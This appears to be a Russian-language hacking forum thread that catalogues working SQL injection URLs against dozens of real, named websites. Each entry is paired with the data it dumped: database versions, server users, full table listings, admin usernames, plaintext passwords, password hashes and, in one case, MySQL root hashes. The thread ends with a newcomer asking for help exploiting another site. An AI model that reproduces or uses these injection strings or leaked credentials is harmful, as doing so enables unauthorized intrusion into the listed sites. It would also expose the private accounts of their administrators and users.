Code: http://www.brianandmichelle.com/food.php?op=show&id=-4+union+select+1,2,3,4,5 Database Version: 5.0.37-log Database name: michelle User name: michelle@localhost
Code: <<"АТН" Агенство Телевидения Новости>> Code: http://atn.kharkov.ua/gallery_view.php?idf=-17+union+select+1,2,unhex(hex(concat_ws(0x3a,username,user_password))),4,5,6,7,8+from+atn.forum_users+limit+1,1--+ db: 5.0.45-log name_db: site user: atn@localhost os: portbld-freebsd5.4 ----------- table: admin kol-vo: 5 log :jne pass:jne21 email :[email protected] acess : 223 +limit+х,х--+ --------- table: forum_users db: atn log :ideatryFriema pass :2b7c0e2fb517f2b9e3e53e0b03537c8b +limit+х,х--+ --------------------------------------- --------------------------------------- <<"Гостинный комплекс "Пушкарская свобода">> Code: http://www.sloboda-gk.ru/news.php?id=-79+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8--+ db: 4.1.22-log name_db: wwwslobodagkru user: slobodag@localhost os: portbld-freebsd6.2
www.eureca.org Code: http://www.eureca.org/catalog/product.php?id=-17+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18 Версия - 4.1.22 Юзер - eureca1@localhost БД - eureca1 Табличка юзеры Code: http://www.eureca.org/catalog/product.php?id=-17+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,login,pass,mail),8,9,10,11,12,13,14,15,16,17,18+from+users P.S. выводятся сразу все юзеры Вход в юзеры Code: http://www.eureca.org/users/login
www.childcare.ie Database Version: 5.0.45-log Database name: jamesla_childcare User name: [email protected]
Code: http://www.veganstockholm.se/lang_eng/eat.php?mode=seeOne&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 Database Version: 5.0.67 Database name: u0501141_a User name: [email protected]
<<"Модельное агенство Ренессанс Москва">> Code: http://www.renessans.ru/news_full.php?id=-508+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,0,1,2,3,4,5,6,7,8--+ db: 5.0.22 name_db: renes users: renes@localhost os: redhat-linux-gnu table: users type: A log: admin pass: $1$WE$fFPL1qCgvP8kQ5xlKUW3R/ name: EW users +limit+х,х--+ ------------------------------ ------------------------------ <<Международня выставка"ПИР">> Code: http://www.pir.ru/news_menu.php?ld=2&id=-6988+union+select+table_name+from+information_schema.columns+where+column_name+like+'password' db: 5.1.26-rc name_db: pir user: pir@localhost os: portbld-freebsd7.0 -=admin=- log: odmin pass: 1qazxsw2
Code: http://www.thefalesteam.com/sell.php?ID=35+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12 Database Version: 4.1.15 Database name: fales User name: fales_web@localhost
Code: http://www.tvog.ru/novinki.php?id=34+UNION+SELECT+1,2,3,4,5,6,7,8 Database Version: 4.1.25 Database name: tvog User name: tvog@localhost
www.puckfair.ie 5.0.45-community-log/**/splashg_puck/**/[email protected] admin:$P$9RhCyg93wapcdaH7omGeUhIYb5gctX/
<<Ресторанные заметки>> Code: http://www.resto.kharkov.ua/user.php?id=-1028+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os)--+ db :5.0.51a-15-log name_db: restox user: u_restox@localhost os: debian-linux-gnu
<<ИнформоЭКСПО - Информационное выставочное агенство>> Code: http://www.informexpo.ru/new/view_content.php?id=-1612'+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6--+ db: 5.0.77-Max-log name_db: udachax7_main user: [email protected] os: unknown-linux-gnu
http://ghosty.ru Code: http://ghosty.ru/meet.php?mid=17+UNION+SELECT+1,2,3,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),5,6+LIMIT+1,1-- Database Version: 4.1.22 Database name: ghosty_smart User name: [email protected]
Code: http://www.kalker-freiheit.net/nachrichten.php?ID=-935+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12/* Database Version: 5.0.32-Debian_7etch8 Database name: muelheim User name: [email protected] Tables: Code: Database [muelheim] Table [Kunden] Table [LinkKat] Table [LinkListe] Table [Links] Table [Nachrichten] Table [NachrichtenLinks] Table [Ressourcen] Table [Stadtteile] Table [TerminInteressenGruppen] Table [TerminLinks] Table [Termine] Table [Testtabelle] Table [Veranstalter] Table [VeranstalterAnsprechpartner] Table [VeranstaltungsOrte] Table [VeranstaltungsOrteSozial] Table [Werbepartner] Table [ZuordnungLink_Nachricht] Table [ZuordnungLink_Stadtteil] Table [ZuordnungNachricht_Historie] Table [ZuordnungNachricht_Kategorie] Table [ZuordnungNachricht_Kunde] Table [ZuordnungNachrichten_Stadtteil] Table [ZuordnungTermin_InteressenGruppen] Table [ZuordnungTermin_Kategorie] Table [ZuordnungTermin_Kunde] Table [ZuordnungTermin_Stadtteil] Table [ilinks] Table [mUser] Table [qub3_queries_que] Table [qub3_relations_rel] Table [qub3_settings_set] Table [sky_newsletter_bann] Table [sky_newsletter_log] Table [sky_newsletter_main] Table [sky_newsletter_settings] Table [sky_newsletter_user] Table [src_cache_cah] Table [src_temp_tmp] Table [tempAktuelles]
<<Агенство путешествий "Лазурь">> Code: http://www.laurel-travel.ru/country_tour.php?id=-44'+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8--+&country_id=34 db :5.0.22 name_db :wwwlaureltravelr user :laureltr@localhost os :redhat-linux-gnu - 4 -=phpbb_users=- Code: http://www.laurel-travel.ru/country_tour.php?id=-44'+union+select+1,2,concat_ws(0x3a,username,%20user_password),4,5,6,7,8+from+phpbb_users+limit+1,1--+&country_id=34
Database Version: 4.1.22-max-log Database name: abma User name: [email protected] Login: people Pass: r1d1cul0us Админка: http://www.abma.ag/admin
www.vjpsych.ie Database Version: 4.1.11-standard Database name: vjpsych_dbase User name: vjpsych@localhost
Через этот сайт есть доступ еще к нескольким: Code: http://www.flu.de/nachrichten.php?id=-6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* Database Version: 5.0.32-Debian_7etch8-log Database name: flu User name: [email protected] mysql user : pass : file_priv Code: root:*1C903C503D579946C23249F14E07F7C193F98298:Y debian-sys-maint:*623A3AC39E85E7A6EF73568F10798862B010A411:Y confixx:*1C903C503D579946C23249F14E07F7C193F98298:N Stl_prioR08:*F900F6B1E9630A2364799C3251A9EC4B96C465EC:N Все таблицы/базы на сервере, кроме information_schema & mysql. Code: Database [abwahl] Table [abwahl_parteien] Table [abwahl_personen] Table [abwahl_personenverzeichnis] Table [abwahl_pol_stimmung] Database [confixx] Table [admin] Table [alerts] Table [allgemein] Table [anbieter] Table [angebote] Table [atdomains] Table [autoresponder] Table [backup] Table [bdefault] Table [billing_del] Table [billing_exp] Table [bin] Table [bmysql] Table [config] Table [cronjobs] Table [cssl] Table [custom_skins] Table [delaccs] Table [dns] Table [domainlog] Table [domains] Table [email] Table [email_forward] Table [ereignisse] Table [events] Table [fehlermeldungen] Table [frontpage] Table [frontpagealias] Table [ftp] Table [grep] Table [htaccess] Table [httpd_definitions] Table [httpd_entries] Table [httpd_permissions] Table [httpd_states] Table [idn_aliases] Table [ipadressen] Table [iprestriction] Table [kunden] Table [logout] Table [maillist] Table [menublock] Table [menuitem] Table [mysql_datenbanken] Table [nladressen] Table [nlinhalt] Table [perl] Table [personalinfo] Table [pop3] Table [pwdreminder] Table [pwschutz] Table [register] Table [restore] Table [server] Table [sessions] Table [skins] Table [spampref] Table [traffic] Table [transfer] Table [types] Table [updates] Table [users] Table [webalizer] Table [webapp] Table [webapp2confixx] Table [webapp_knowledge] Table [webapp_param] Table [webapp_requir] Table [webapp_user] Table [webapp_user_param] Table [webmail_ab] Table [webmail_def_from] Table [webmail_session] Table [webmail_sign] Table [zeiten] Database [flu] Table [airlines] Table [airports] Table [bilder] Table [comments] Table [imglisttrack] Table [nachrichten] Table [news_anbieter] Table [news_entry] Table [news_kategorien] Table [news_language] Table [news_quelle] Table [news_users] Table [votings] Database [usr_web126_1] Table [faqadminlog] Table [faqadminsessions] Table [faqchanges] Table [faqcomments] Table [faqdata] Table [faqfragen] Table [faqnews] Table [faqrights] Table [faqrubrik] Table [faqsessions] Table [faqstatistik] Table [faquser] Table [faqvisits] Table [faqvoting] Table [internetfaqadminlog] Table [internetfaqadminsessions] Table [internetfaqchanges] Table [internetfaqcomments] Table [internetfaqdata] Table [internetfaqfragen] Table [internetfaqnews] Table [internetfaqrights] Table [internetfaqrubrik] Table [internetfaqsessions] Table [internetfaqstatistik] Table [internetfaquser] Table [internetfaqvisits] Table [internetfaqvoting] Database [usr_web126_2] Table [anfragen] Table [angebote] Table [auftrag_annahme] Table [auslandsstand] Table [bandbreiten] Table [betreuung] Table [blankoformular_sprachen] Table [branchenloesungen] Table [counter] Table [dark_laendernamen] Table [forum] Table [infos_bonusprovision] Table [kunden] Table [leitungen_international] Table [lexikon_statistik] Table [mitarbeiter_aktuell] Table [nachrichten] Table [orte] Table [partner] Table [partner_analogxxl] Table [passwort] Table [plz_de] Table [produktdatenbank] Table [rubriken] Table [shop] Table [statistik] Table [telefon_alice_citys] Table [tk_vorschlaege] Table [tkfach] Table [turkflat_de_anfrage] Table [vertriebspartner_voranmeldung] Table [vorwahlen] Table [zaehler] Database [usr_web126_3] Table [dark_anbietenphp_sprachen] Table [dark_atm_kunden] Table [dark_center_sprachen] Table [dark_framerelay_kunden] Table [dark_glasfaser_kunden] Table [dark_glfangebot_sprachen] Table [dark_kabel_angebote] Table [dark_kontakt_sprachen] Table [dark_laendernamen] Table [dark_landstandard_sprachen] Table [dark_menu_sprachen] Table [dark_metatags_sprachen] Table [dark_mpls_kunden] Table [dark_newsletter_sprachen] Table [dark_newsletterkunden] Table [dark_passwort] Table [dark_satellit_kunden] Table [dark_sonstige_anfragen] Table [dark_sprachenleiste_sprachen] Table [dark_standleitungen_kunden] Table [dark_start_sprachen] Table [dark_suchenphp_sprachen] Table [leitungen_international] Table [leitungen_international2] Database [usr_web126_4] Table [besuchervon] Table [carrier] Table [carrier_standort] Table [dsl_auftraege_zuordnung] Table [http_referer_stat] Table [news_pv] Table [partnerdomains] Table [partnervertrieb] Table [plz_ew] Table [plz_vw] Table [potentielle_auftraege] Table [telefonanschluss_preisuebersicht] Table [telekom_auftraege] Table [tkw_csv_versendet] Table [vertragsunterlagen_de_besuchervon] Database [usr_web126_5] Table [anbieter] Table [links] Table [metatags] Table [produkte] Table [searchs] Database [usr_web126_6] Table [anbieter] Table [kategorien] Table [language] Table [nachrichten] Table [quelle] Table [users]
Code: http://www.cierrenet.it/sing.php?tipo=libro&id=-3976+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14-- version():user():database() 5.0.45:cierredb@localhost:libri PR: 5 cmsms_adminlog Code: http://www.cierrenet.it/admin/login.php
<<Stelladimare>> Code: http://www.stelladimare.ru/index.php?option=com_news&Itemid=58&task=view&id=-120+union+select+-1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--+ db: 4.1.22 name_db: stelladi_joom0 user: [email protected] os: portbld-freebsd6.2 - robots.txt - Code: User-agent: Yandex Disallow: /*?_openstat Disallow: /*?option=com_cruiseinfo&Itemid=53 Disallow: /templates/stella_di_mare/css/ Disallow: /AC_RunActiveContent.js Disallow: /administrator/ Disallow: /cache/ Disallow: /components/ Disallow: /editor/ Disallow: /help/ Disallow: /images/ Disallow: /includes/ Disallow: /language/ Disallow: /mambots/ Disallow: /media/ Disallow: /modules/ Disallow: /templates/ Disallow: /installation/ Host: www.stelladimare.ru User-agent: Googlebot Disallow: /*?_openstat Disallow: /*?option=com_cruiseinfo&Itemid=53 Disallow: /templates/stella_di_mare/css/ Disallow: /administrator/ Disallow: /cache/ Disallow: /components/ Disallow: /editor/ Disallow: /help/ Disallow: /images/ Disallow: /includes/ Disallow: /language/ Disallow: /mambots/ Disallow: /media/ Disallow: /modules/ Disallow: /templates/ Disallow: /installation/ Disallow: /AC_RunActiveContent.js User-agent: * Disallow: /templates/stella_di_mare/css/ Disallow: /AC_RunActiveContent.js Disallow: /administrator/ Disallow: /cache/ Disallow: /components/ Disallow: /editor/ Disallow: /help/ Disallow: /images/ Disallow: /includes/ Disallow: /language/ Disallow: /mambots/ Disallow: /media/ Disallow: /modules/ Disallow: /templates/ Disallow: /installation ----------------------- ----------------------- <<Компания "Теремок">> Code: http://www.teremok.ru/forum.phtml?act=read&msg=4316+and+1=15+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5--+ db: 5.0.67-log name_db: u20648 user :[email protected] os :unknown-freebsd6.2 table: Admin_users log: padmin pas: 5bfee75778f81085 -=users=- limit+Х,Х--+
Нашёл инъекцию , только я совсем новичок и раскрутить не получилось Code: http://www.praktik-um.ru/arenda.php?base=1'+union+select+1,2,version(),3,4,5,6,7--
